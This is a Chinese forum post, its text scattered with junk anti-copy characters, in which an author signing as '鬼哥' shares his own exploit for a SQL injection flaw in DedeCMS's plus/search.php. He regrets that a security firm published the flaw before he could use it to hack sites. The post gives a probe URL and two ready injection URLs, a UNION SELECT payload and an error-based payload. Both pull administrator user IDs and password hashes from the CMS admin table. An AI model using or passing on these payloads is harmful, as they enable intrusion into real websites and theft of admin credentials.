转载不加作者名的没JJ
* y @& |4 S. X
3 u: U3 x9 Y5 u! P; ]- W哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
& ?- s2 Y' A9 j4 m/ @" s# J4 `
3 h& Q, K0 N1 O& v- `3 C2 S {既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
( ~% C4 B8 F a( I, T3 y R2 H) x9 B
我一般是这样测试的:8 G. |. [* A* ?& h* e
9 x/ U9 r' @) T1 i4 v2 _提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a% c8 J+ H( O) ~/ ^! B3 K1 x: S1 R
+ c$ r e# [1 w4 w c3 B, L转载不加作者名的没JJ& m* K4 [8 u3 Y2 L% k
' n% X: E3 {( H: F) x9 O; t8 T作者:鬼哥
- c/ k# s- ^* w
6 h0 z1 w c8 m; [# u 4 R& D* I" _+ r3 K7 U" b
) @; f5 ^; j' e3 R d2 `/ G M0 W: n, K看结果如果提示
1 B/ P% W4 N0 N- n2 e% J6 S/ ?& d8 m) _" M7 }9 `" L! o) _
Safe Alert: Request Error step 2 !* e% f/ p% O! ~5 E8 K
6 x! f) {4 [' q- D/ M那么直接用下面的exp
! t7 H% d- |" a- N j$ q& A2 c, Q+ n T; S
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
' G. f0 I2 u6 i% b/ W8 h/ n, Y- E. F6 G) x
6 U5 S, `8 q) l, z4 ^# d& C* G! e看结果如果提示 [! Q9 G+ o* z% w
8 e2 M1 J+ F4 s9 J( {
Safe Alert: Request Error step 1 !1 Q, c/ `& M+ ^8 \1 C3 G# u! Y
" f: P! z0 C9 D那么直接用下面的exp6 r; H5 k6 H8 x4 Z+ X- Y
$ @( N# n+ b- x2 ^) R9 b1 D
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
# x9 P9 B- S1 K8 I- m
* t6 @+ u: u' E c* `; L) d
! h" {" ^9 ?2 M如果正常显示证明漏洞不存在了。
& U/ @, c0 X4 w0 x- V h( n$ w- Q$ N2 u' B, i4 F$ u" f
转载不加作者名的没JJ |